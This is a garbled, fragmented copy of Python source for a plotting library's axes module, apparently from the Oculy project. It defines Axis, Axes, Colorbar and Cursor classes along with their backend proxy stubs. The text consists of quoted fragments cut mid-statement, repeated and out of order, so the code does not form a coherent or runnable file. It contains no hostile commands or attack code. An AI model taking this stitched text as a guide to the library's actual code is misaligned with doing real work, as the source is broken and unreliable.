#: Is the axis direction inverted. inverted = Bool() #: Label", "with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title:", "already exist in axes {self}\") axes = plot.axes_mapping if not axes: axes =", "FIXME Add connections to the proxy and a way to prevent self recursion", "super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name", "KeyError( f\"Plot {id} does not exist in axes {self.axes},\" f\" known plots are", "legends = Dict(str, str) #: Projection to use on the axes. projection =", "= Str() #: Tick labels. tick_labels = List(str) #: Font used for the", "position of this axis with the other axis in data coordinate. #: Setting", "2D plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #:", "holding the axes. figure = ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis =", "for a 2D plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda:", "raise RuntimeError( f\"The axes used for {[lab for lab, _ in missing]} do", "f\" known plots are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self} does", "bounds: Optional[Tuple[float, float]] = None, ): pass def remove_line(self, id: str) -> None:", "to the proxy and a way to prevent self recursion # FIXME Add", "self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a", "for {[lab for lab, _ in missing]} do not \" \"exist. Existing axes", "class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As", "(accross different figures ie beyond # matplotlib default) # --- Private API #:", "and way to manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str,", "Bool() #: List of 2 tuple representing a possibly discountinuous axis. limits =", "plot with {id} already exist in axes {self}\") axes = plot.axes_mapping if not", "is plotted. plot.axes = self self.plots[plot.id] = plot # Initialize the plot if", "@mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels:", "if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name", "self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in", "unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise RuntimeError(", "Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported", "None: \"\"\"Add a plot to the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A", "getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes used", "\"top\", \"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping = axes # Validate", "colorbar = Typed(Colorbar) #: Set of cursors currently active on the graph cursors", "del self.colorbar def add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float,", "projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis:", "elements #: later on. self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy of", "way to manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button:", "def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self,", "should be created. location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis", "Copyright 2020-2021 by Oculy Authors, see git history for more details. # #", "pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported", "Projection to use on the axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs):", "later on. self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\"", "str) -> None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to", "Is the axis direction inverted. inverted = Bool() #: Label of the axis", "see git history for more details. # # Distributed under the terms of", "( pa not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None", "LICENCE, distributed with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated", "knows where it is plotted. plot.axes = self self.plots[plot.id] = plot # Initialize", "the proxy of the object and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis,", "to the resolver to be able to add more elements #: later on.", "the proxy of the figure.\"\"\" for p in self.plots.values(): p.finalize() for c in", "'top', 'bottom', provided axes are \" f\"{[pa for _, pa in unknown]}).\" )", "# FIXME need to sync to the proxy def _resolve_figure(): from .figure import", "inverted = Bool() #: Label of the axis label = Str() #: Tick", "if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def", "= None, ): pass @mark_backend_unsupported def remove_line(self, id: str) -> None: pass class", "for ax in axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified axes are", "elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes", "): unknown = [] missing = [] for lab, pa in axes.items(): if", "RuntimeError( f\"The axes used for {[lab for lab, _ in missing]} do not", "ie beyond # matplotlib default) # --- Private API #: Reference to the", "if not self.proxy: raise RuntimeError(f\"Axes {self} does not have an active proxy.\") self.proxy.remove_plot(id,", "pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self,", "figure = ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis = Typed(Axis) bottom_axis =", "for the tick labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement):", "do not \" \"correspond to any valid axes (valid axes are \" \"'left',", "str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported", "button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass", "class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to the figure holding the", "#: Conserve a reference to the resolver to be able to add more", "a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based on", "@mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str,", "Tuple from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str from", "at which the colorbar should be created. location = Enum(\"right\", \"top\", \"left\", \"bottom\")", "Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str from atom.api import Tuple as", "# FIXME Add connections to the proxy and a way to prevent self", "Conserve a reference to the resolver to be able to add more elements", "Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy", "Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value = Float() #: y_value = Float()", "plots are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self} does not have", "cursors currently active on the graph cursors = ATuple(Cursor) #: Set of plots", "axis. limits = List(tuple) #: Is the axis direction inverted. inverted = Bool()", "\" f\"specified axes are {[pa for _, pa in missing]}.\" ) # Make", "from atom.api import Typed from ..backends.resolver import BackendResolver from .base import BasePlot, PlotElement,", "axis. Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin,", "exist in axes {self.axes},\" f\" known plots are {self.plots}\" ) if not self.proxy:", "_, pa in unknown]}).\" ) else: raise RuntimeError( f\"The axes used for {[lab", "axes plots = Dict(str, BasePlot) #: Display a major grid major_grid_enabled = Bool()", "PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. Handle: - scaling -", "NOT be edited in place. legends = Dict(str, str) #: Projection to use", "from .figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #:", "to draw into the axis and way to manipulate the axis appearance. \"\"\"", "pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass", "\" \"exist. Existing axes are \" f\"{[ax for ax in axes.axes._fields if axes.axes[ax]", "pass @mark_backend_unsupported def add_cursor( self, axes=None ): # Need to specify to which", "@mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited to", "Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value", "continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c", "Private API #: Reference to the backend resolver needed to dynamically add axes", "have an impact only if there are only 2 active #: axes in", "None, ): pass @mark_backend_unsupported def remove_line(self, id: str) -> None: pass class Axis(PlotElement):", "used for the tick labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class", "be autoscaled auto_scaling = Bool() #: List of 2 tuple representing a possibly", "if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis:", "axes {self.axes},\" f\" known plots are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes", "colorbar should be created. location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that", "on its ID.\"\"\" if id not in self.plots: raise KeyError( f\"Plot {id} does", "= None, ): pass def remove_line(self, id: str) -> None: pass # FIXME", "a possibly discountinuous axis. limits = List(tuple) #: Is the axis direction inverted.", "plot if we have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove", "object. left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis)", "orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass def remove_line(self,", "modifiers # TODO Add the ability to link axes (accross different figures ie", "if not axes: axes = { \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\":", "= Dict(str, BasePlot) #: Display a major grid major_grid_enabled = Bool() #: Display", "invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass", "Authors, see git history for more details. # # Distributed under the terms", "= Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar", "grid major_grid_enabled = Bool() #: Display a minor grid minor_grid_enabled = Bool() #:", "def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]):", "pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes.", "@mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def", "#: Tick labels. tick_labels = List(str) #: Font used for the label label_font", "\"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass", "only if there are only 2 active #: axes in the axes_set. intercept", "# # The full license is in the file LICENCE, distributed with this", "in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference to the resolver", "are \" f\"{[pa for _, pa in unknown]}).\" ) else: raise RuntimeError( f\"The", "FIXME Need to define the proper API to enable zooming/panning and modifiers #", "@mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting:", "Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis be autoscaled auto_scaling = Bool()", "by Oculy Authors, see git history for more details. # # Distributed under", "the axes supposed to be used. if any( ( pa not in (\"left\",", "f\"The axes used for {[lab for lab, _ in missing]} do not \"", "grid minor_grid_enabled = Bool() #: # SHOULD NOT be edited in place. legends", "#: Font used for the label label_font = Dict(str) #: Font used for", "\"exist. Existing axes are \" f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is", "self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar:", "bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def", "Font used for the label label_font = Dict(str) #: Font used for the", "left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #:", "for a single axis. Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self,", "Mapping, Optional, Sequence, Tuple from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int,", "self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping = axes", "enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self):", "= List(str) #: Font used for the label label_font = Dict(str) #: Font", "legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self,", "coordinate. #: Setting this values will have an impact only if there are", "the proxy def _resolve_figure(): from .figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes", "#: later on. self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy of the", "manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass", "pass @mark_backend_unsupported def add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float,", "values will have an impact only if there are only 2 active #:", "in self.plots: raise KeyError( f\"Plot {id} does not exist in axes {self.axes},\" f\"", "axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified axes are {[pa for _,", "in axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified axes are {[pa for", "#: c_value = Float(float(\"nan\")) # FIXME need to sync to the proxy def", "As in matplotlib an axis is expected to provide way to draw into", "= axes # Validate the axes supposed to be used. if any( (", "does not exist in axes {self.axes},\" f\" known plots are {self.plots}\" ) if", "if pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\")", "BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a", "attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError()", "@mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached", "Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value = Float() #: y_value", "\"\"\"Remove a plot based on its ID.\"\"\" if id not in self.plots: raise", "Enum, Float, ForwardTyped, Int, List, Str from atom.api import Tuple as ATuple from", "breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str, font:", "(\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa))", "self._resolver: plot.initialize(self._resolver) def remove_plot(self, id): \"\"\"Remove a plot based on its ID.\"\"\" if", "= ForwardTyped(lambda: Axes) #: Should that axis be autoscaled auto_scaling = Bool() #:", "= Float() # FIXME Add connections to the proxy and a way to", "axes.values() ): unknown = [] missing = [] for lab, pa in axes.items():", "self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the", "str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported", "add_cursor( self, axes=None ): # Need to specify to which axes the cursor", "be created. location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis be", "of 2 tuple representing a possibly discountinuous axis. limits = List(tuple) #: Is", "define the proper API to enable zooming/panning and modifiers # TODO Add the", "not \" \"exist. Existing axes are \" f\"{[ax for ax in axes.axes._fields if", "if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping =", "{self}\") axes = plot.axes_mapping if not axes: axes = { \"x\": \"bottom\" if", "limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title: str,", "there are only 2 active #: axes in the axes_set. intercept = Float()", "on. self._resolver = resolver def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for", "breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool): pass", "remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id: str, orientation: str, position: float,", "c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name =", "BSD license. # # The full license is in the file LICENCE, distributed", "terms of the BSD license. # # The full license is in the", "parent axes. axes = ForwardTyped(lambda: Axes) #: Position at which the colorbar should", "does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar", "proper API to enable zooming/panning and modifiers # TODO Add the ability to", "plot.axes = self self.plots[plot.id] = plot # Initialize the plot if we have", "bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited to axis with no breaks", "-------------------------------------------------------------------------------------- # Copyright 2020-2021 by Oculy Authors, see git history for more details.", "the proper API to enable zooming/panning and modifiers # TODO Add the ability", "\"\"\"Finalize the proxy of the figure.\"\"\" for p in self.plots.values(): p.finalize() for c", "figure.\"\"\" for p in self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if self.colorbar:", "be edited in place. legends = Dict(str, str) #: Projection to use on", "if axes.axes[ax] is not None]}, \" f\"specified axes are {[pa for _, pa", "self self.plots[plot.id] = plot # Initialize the plot if we have a resolver", "Bool() #: Display a minor grid minor_grid_enabled = Bool() #: # SHOULD NOT", "plot\"\"\" #: Reference to the figure holding the axes. figure = ForwardTyped(_resolve_figure) #:", "PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. Handle: - scaling", "in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab,", "for lab, _ in unknown]} do not \" \"correspond to any valid axes", "the axes. figure = ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis = Typed(Axis)", "single axis. Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): #", "@mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass", "in the axes_set. intercept = Float() # FIXME Add connections to the proxy", "self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self,", "pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is", "unknown]} do not \" \"correspond to any valid axes (valid axes are \"", "def add_cursor( self, axes=None ): # Need to specify to which axes the", "Reference to the figure holding the axes. figure = ForwardTyped(_resolve_figure) #: Axes composing", "Set of cursors currently active on the graph cursors = ATuple(Cursor) #: Set", "\"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None ) for pa in axes.values()", "# Need to specify to which axes the cursor is bound pass @mark_backend_unsupported", "the figure.\"\"\" for p in self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if", "y_value = Float() #: c_value = Float(float(\"nan\")) # FIXME need to sync to", "Float() #: c_value = Float(float(\"nan\")) # FIXME need to sync to the proxy", "enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass", "): # Need to specify to which axes the cursor is bound pass", "= ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis = Typed(Axis) bottom_axis = Typed(Axis)", "any valid axes (valid axes are \" \"'left', 'right', 'top', 'bottom', provided axes", "major grid major_grid_enabled = Bool() #: Display a minor grid minor_grid_enabled = Bool()", "None ) for pa in axes.values() ): unknown = [] missing = []", "self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What axis", "with {id} already exist in axes {self}\") axes = plot.axes_mapping if not axes:", "for axes. As in matplotlib an axis is expected to provide way to", "axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to", "id: str) -> None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference", "Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to the figure holding the axes.", "#: Display a minor grid minor_grid_enabled = Bool() #: # SHOULD NOT be", "= plot.axes_mapping if not axes: axes = { \"x\": \"bottom\" if self.bottom_axis else", "any( ( pa not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is", "pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib an axis is expected", "enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self,", "to specify to which axes the cursor is bound pass @mark_backend_unsupported def remove_cursor(self):", "impact only if there are only 2 active #: axes in the axes_set.", "an impact only if there are only 2 active #: axes in the", "Bool() #: # SHOULD NOT be edited in place. legends = Dict(str, str)", "remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self,", "this object. left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis =", "None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to the parent", "possibly discountinuous axis. limits = List(tuple) #: Is the axis direction inverted. inverted", "inverted. inverted = Bool() #: Label of the axis label = Str() #:", "tick_labels_font = Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\"", "zooming/panning and modifiers # TODO Add the ability to link axes (accross different", "self, axes=None ): # Need to specify to which axes the cursor is", "self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar: return", "Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log", "pass @mark_backend_unsupported def set_limits(self, limits): # Limited to axis with no breaks pass", "location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis be autoscaled auto_scaling", "to define the proper API to enable zooming/panning and modifiers # TODO Add", "plot based on its ID.\"\"\" if id not in self.plots: raise KeyError( f\"Plot", "plot.axes_mapping if not axes: axes = { \"x\": \"bottom\" if self.bottom_axis else \"top\",", "class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib an axis is expected to", "2 tuple representing a possibly discountinuous axis. limits = List(tuple) #: Is the", "tick_labels = List(str) #: Font used for the label label_font = Dict(str) #:", "bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with", "the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot with {id} already exist", "be used. if any( ( pa not in (\"left\", \"bottom\", \"right\", \"top\") or", "def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ): # Need to specify", "sure the plot knows where it is plotted. plot.axes = self self.plots[plot.id] =", "def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for p in self.plots.values(): p.finalize()", "remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ): #", "#: List of 2 tuple representing a possibly discountinuous axis. limits = List(tuple)", "to provide way to draw into the axis and way to manipulate the", "= [] missing = [] for lab, pa in axes.items(): if pa not", "f\"{[pa for _, pa in unknown]}).\" ) else: raise RuntimeError( f\"The axes used", "= ForwardTyped(lambda: Axes) #: Position at which the colorbar should be created. location", "def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str],", "List(tuple) #: Is the axis direction inverted. inverted = Bool() #: Label of", "axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue", "on the graph cursors = ATuple(Cursor) #: Set of plots currently displayed in", "for _, pa in unknown]}).\" ) else: raise RuntimeError( f\"The axes used for", "scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported", "auto_scaling = Bool() #: List of 2 tuple representing a possibly discountinuous axis.", "missing]}.\" ) # Make sure the plot knows where it is plotted. plot.axes", "raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): #", "pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar", "x_value = Float() #: y_value = Float() #: c_value = Float(float(\"nan\")) # FIXME", "ForwardTyped(lambda: Axes) #: Position at which the colorbar should be created. location =", "set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font:", "self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values():", "atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str from atom.api import", "to manipulate the axis appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str):", "way to draw into the axis and way to manipulate the axis appearance.", "'bottom', provided axes are \" f\"{[pa for _, pa in unknown]}).\" ) else:", "class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. Handle: - scaling - bounds \"\"\"", "p.finalize() for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis,", "figure holding the axes. figure = ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis", "= { \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis else", "colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver)", "axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in", "axes. As in matplotlib an axis is expected to provide way to draw", "def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def", "associated proxy. \"\"\" from typing import Any, Mapping, Optional, Sequence, Tuple from atom.api", "ATuple(Cursor) #: Set of plots currently displayed in the axes plots = Dict(str,", "Dict(str) #: Font used for the tick labels tick_labels_font = Dict(str) #: aspect_ratio", "#: Set of plots currently displayed in the axes plots = Dict(str, BasePlot)", "bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button:", "p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve a reference to the", "{[lab for lab, _ in missing]} do not \" \"exist. Existing axes are", "only 2 active #: axes in the axes_set. intercept = Float() # FIXME", "for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis,", "an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the axes.\"\"\"", "str, position: float, bounds: Optional[Tuple[float, float]] = None, ): pass def remove_line(self, id:", "-> None: pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to the", "Display a major grid major_grid_enabled = Bool() #: Display a minor grid minor_grid_enabled", "\"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id:", "TODO Add the ability to link axes (accross different figures ie beyond #", "# lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def", "as ATuple from atom.api import Typed from ..backends.resolver import BackendResolver from .base import", "set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass", "axes = ForwardTyped(lambda: Axes) #: Position at which the colorbar should be created.", "= Float() #: y_value = Float() #: c_value = Float(float(\"nan\")) # FIXME need", "proxy of the object and the axes.\"\"\" super().initialize(resolver) for axis in (self.left_axis, self.bottom_axis,", "self.colorbar: self.colorbar.finalize() for axis in (self.top_axis, self.right_axis, self.bottom_axis, self.left_axis): axis.finalize() super().finalize() def add_cursor(self,", "a plot to the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot with", "if plot.id in self.plots: raise RuntimeError(f\"A plot with {id} already exist in axes", "#: Label of the axis label = Str() #: Tick labels. tick_labels =", "to link axes (accross different figures ie beyond # matplotlib default) # ---", "of the BSD license. # # The full license is in the file", "for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib an", "if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del", "for pa in axes.values() ): unknown = [] missing = [] for lab,", "need to sync to the proxy def _resolve_figure(): from .figure import Figure return", "other axis in data coordinate. #: Setting this values will have an impact", "this values will have an impact only if there are only 2 active", "pass class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to the parent axes.", "plot to the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot with {id}", "draw into the axis and way to manipulate the axis appearance. \"\"\" @mark_backend_unsupported", "def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]):", "tick labels tick_labels_font = Dict(str) #: Intercept position of this axis with the", "place. legends = Dict(str, str) #: Projection to use on the axes. projection", "f\"Plot 